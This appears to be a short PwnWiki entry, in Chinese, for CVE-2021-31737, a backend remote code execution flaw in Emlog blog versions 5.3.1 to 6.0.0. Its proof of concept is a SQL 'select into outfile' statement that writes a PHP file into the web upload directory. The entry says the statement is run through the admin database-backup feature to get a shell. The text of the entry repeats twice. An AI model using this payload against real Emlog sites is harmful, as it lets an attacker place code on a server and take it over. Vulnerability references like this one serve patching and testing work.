CVE-2021-31737 Emlog v5.3.1 - v6.0.0 後台RCE漏洞
From PwnWiki
影響版本
Emlog v5.3.1 Emlog v6.0.0
POC
select "<?php phpinfo();?>" into outfile "/var/www/html/tet1/emlog_6.0.0/src/content/uploadfile/202104/222.php";
通過在後台數據-備份數據庫進行構造惡意sql語句進行備份上傳-getshell
Emlog v5.3.1 Emlog v6.0.0
select "<?php phpinfo();?>" into outfile "/var/www/html/tet1/emlog_6.0.0/src/content/uploadfile/202104/222.php";
通過在後台數據-備份數據庫進行構造惡意sql語句進行備份上傳-getshell